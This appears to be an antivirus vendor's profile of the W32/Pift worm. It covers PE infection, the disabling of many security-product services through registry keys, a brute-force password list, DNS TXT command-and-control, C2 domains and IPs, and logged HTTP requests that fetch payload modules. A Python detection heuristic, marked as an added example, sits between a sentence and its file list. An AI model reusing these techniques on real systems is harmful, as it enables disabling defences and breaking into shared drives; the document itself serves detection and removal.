Virus Profile: W32/Pift

Virus Profile information details
Risk Assessment: Home Low | Corporate Low
Date Discovered: 7/19/2012
Date Added: 7/19/2012
Origin: N/A
Length: N/A
Type: Internet Worm
Subtype: Win32
DAT Required: 6612

Description

W32/Pift infects executable files on local, removable and remote shared drives. The virus simply writes its code to the end of the last section of the host PE file and redirects the entry point RVA to point to its own entry point.

Beyond infecting the executables it encounters on local, removable and remotely shared drives, W32/Pift actively searches for further executable files to infect.

Aliases

  • Microsoft - Virus:Win32/Serpip.A
  • Kaspersky - Virus.Win32.Suspic.gen
  • AVG - Win32/Heur
  • Trend Micro - PE_MUSTAN.A

Indication of Infection

Presence of the files and registry keys listed under Virus Characteristics below.

Unexpected network connections to the IP addresses listed under Virus Characteristics below.


Virus Characteristics

Upon execution, the virus modifies executable files present on the system by adding its viral code to the end of the last section and then pointing the entry point to the start of this added code.

The virus also adds a marker to the file header to prevent reinfection.

It also drops the following files, which are used as a restart mechanism for the virus in case infected files are cleaned:
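As an added example (not McAfee's code and not part of the original profile), the following Python heuristic parses a PE header and flags the layout described above: an entry point that lands in the tail of the last section. The PE headers it checks are constructed inside the block as sample data, and the 50% tail threshold, section names and sizes are assumptions, not values taken from W32/Pift samples.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000

def parse_pe(data):
    """Return (AddressOfEntryPoint, [(name, vaddr, vsize, rawsize, flags), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]              # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]          # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]     # SizeOfOptionalHeader
    entry = struct.unpack_from("<I", data, pe + 24 + 16)[0]   # AddressOfEntryPoint RVA
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, _, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, pe + 24 + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), vaddr, vsize, rawsize, flags))
    return entry, sections

def appended_code_suspicion(data):
    """EP in the tail of the highest-VA section is the layout an appending infector leaves."""
    entry, sections = parse_pe(data)
    last = max(sections, key=lambda s: s[1])                  # section with highest VA
    start, end = last[1], last[1] + max(last[2], last[3])
    if not start <= entry < end:
        return False, "entry point outside the last section"
    if entry - start < (end - start) // 2:                    # assumed threshold: last 50%
        return False, "entry point in the first half of the last section"
    exe = "executable" if last[4] & IMAGE_SCN_MEM_EXECUTE else "NOT executable"
    return True, f"EP {entry:#x} in tail of last section {last[0]!r} ({exe})"

def build_pe(entry, sections):
    """Constructed minimal PE32 header for the samples below (header only, no code bytes)."""
    dos = bytearray(b"MZ".ljust(64, b"\0"))
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew: right after DOS header
    opt = bytearray(224)                                      # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                     # Magic: PE32
    struct.pack_into("<I", opt, 16, entry)                    # AddressOfEntryPoint
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"),
                                 vs, va, rs, rp, 0, 0, 0, 0, fl)
                     for n, va, vs, rs, rp, fl in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table

TEXT = (".text", 0x1000, 0x3000, 0x3000, 0x400, 0x60000020)
# Constructed samples: normal layout (EP in .text) vs. the post-infection layout described above
# (.rsrc grown by 0x400 bytes, made executable, EP moved into the tail). Sizes are assumptions.
CLEAN = build_pe(0x1200, [TEXT, (".rsrc", 0x4000, 0x2000, 0x2000, 0x3400, 0x40000040)])
INFECTED = build_pe(0x5E00, [TEXT, (".rsrc", 0x4000, 0x2400, 0x2400, 0x3400, 0x60000040)])
```

Run `appended_code_suspicion(CLEAN)` and `appended_code_suspicion(INFECTED)` to compare the two verdicts; a data section that suddenly carries the execute flag is a second hint worth surfacing in the reason string.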

  •  %System32%\wmicuclt.exe
  •  %System32%\wmicuclt

Some of the newly created registry values are:

  •  HKLM\SYSTEM\ControlSet001\Services\360rp\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\a2AntiMalware\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\amsp\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\AntiVirService\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\avast! Antivirus\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\AVGIDSAgent\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\AVGwd\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\avp\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\ekrn\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\F-Secure Gatekeeper Handler Starter\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\FSMA\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\FSORSPClient\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\kxesapp\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\kxescore\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\mcods\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\MsMpSvc\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\Mcshield\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\NIS\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\PavFnSvr\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\pavsrv\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\RsRavMon\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\SavService\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\V3 Service\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet002\Services\vsserv\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet002\Services\zhudongfangyu\
    Start: 0x00000004

By setting the Start value of these services (all belonging to security products) to 0x00000004, the SERVICE_DISABLED start type, the malware ensures that they are never started.

Malware also adds the following keys to store its data:

  •  HKLM\SYSTEM\Select\v
  •  HKLM\SYSTEM\Select\ext
  •  HKLM\SYSTEM\Select\plg
  •  HKLM\SYSTEM\Select\pu
  •  HKLM\SYSTEM\Select\p

The value "v" contains the complete virus code. The other values store downloaded modules and stolen passwords.

It also adds the following key so that the malware can run in Safe Mode as well:

  • HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\wmicucltsvc

It also injects malicious threads into the following processes:

  • Svchost.exe
  • Lsass.exe

These threads are responsible for all virus operations and also for restarting the malware after a reboot.

In memory it holds the following strings, which it uses to brute-force credentials for remote shares:

  • Admim
  • Password
  • User
  • Server
  • Testl
  • Rockyou
  • Letmein
  • Secret
  • Ilovec
  • Computp
  • Root
  • Princess
  • Dragon
  • PASSWORD
  • Woaini
  • Wojia
  • Database
  • Oracle
  • 123qwe
  • Internetd
  • Asd
  • Ihavenol
  • Godblesslk
  • Enable
  • 23abc
  • 007
  • Alpha
  • Patrick
  • Istratoyrx
  • Foobar
  • Temp
  • Asdf
  • Yxcv
  • Home
  • Xxx
  • Owner
  • Login
  • Pwd
  • Mypc
  • Pwv
  • Pussy
  • 69d
  • Mustang
  • Ball
  • Masdy
  • Michaelm
  • Shadow
  • Monkey
  • Fuckme
  • Jordan
  • Harley
  • Ranger
  • Iwantu
  • Jennifer
  • Hup-
  • Batman
  • Trustno1
  • Thomas
  • Tigx
  • Robert
  • Kill}
  • P@ssW0rd
  • Soft
  • Assb
  • 123x

The malware uses DNS as its command and control channel. To receive commands it queries the TXT record of certain domains; the authoritative DNS server for these domains replies with a base64-encoded TXT record containing the commands to perform. The response may look like this:

  • e.ppift.net     text =    "p666666666666666666666666666666666666666667666664kYa7kRaD4FcF!RX7MRCu9WO66666666p6666T66666CD6JaDxZXekFC8!PC9NyUD2J666666666666666666666666666666666666666666666666666"

It contacts the following hostnames and IP addresses. The instructions it receives may contain additional URLs from which further malicious files are downloaded:

  •  e.ppift.in
  •  e.ppift.com
  •  e.ppift.net
  •  ns1.ppns.info
  •  ns2.ppns.info
  •  ns3.ppns.info
  •  ns4.ppns.info
  •  206.137.17.89
  •  199.182.233.17
  •  110.45.151.19

Once the malware gets a response from the DNS server, it performs HTTP requests to download more files to the machine. I observed the following requests:

  • GET /plg3.z HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0
    Connection: Close
    Host: d.ppns.info
  • GET /ext1.z HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0
    Connection: Close
    Host: d.ppns.info

The two files above were observed being downloaded by the virus. They contain modules that work only inside the virus in memory and may contain any kind of code. The modules currently being downloaded appear to be a backdoor and password stealers. They are not standalone executables, but partial code that the malware loads from the registry when necessary.

It then starts to scan the local network for open shares in order to infect files remotely (port 137).

   

All Users:

Please use the following instructions for all supported versions of Windows to remove threats and other potential risks:

1. Disable System Restore.

2. Update to the current engine and DAT files for detection and removal.

3. Run a complete system scan.

Modifications made to the system Registry and/or INI files for the purpose of hooking system startup will be successfully removed when cleaning with the recommended engine and DAT combination (or higher).

1. Go to the Microsoft Recovery Console and restore a clean MBR.

On Windows XP:

Insert the Windows XP CD into the CD-ROM drive and restart the computer.
When the "Welcome to Setup" screen appears, press R to start the Recovery Console.
Select the Windows installation that is compromised and provide the administrator password.
Issue the 'fixmbr' command to restore the Master Boot Record.
Follow the on-screen instructions.
Reset and remove the CD from the CD-ROM drive.

On Windows Vista and 7:

Insert the Windows CD into the CD-ROM drive and restart the computer.
Click on "Repair Your Computer".
When the System Recovery Options dialog comes up, choose the Command Prompt.
Issue the 'bootrec /fixmbr' command to restore the Master Boot Record.
Follow the on-screen instructions.
Reset and remove the CD from the CD-ROM drive.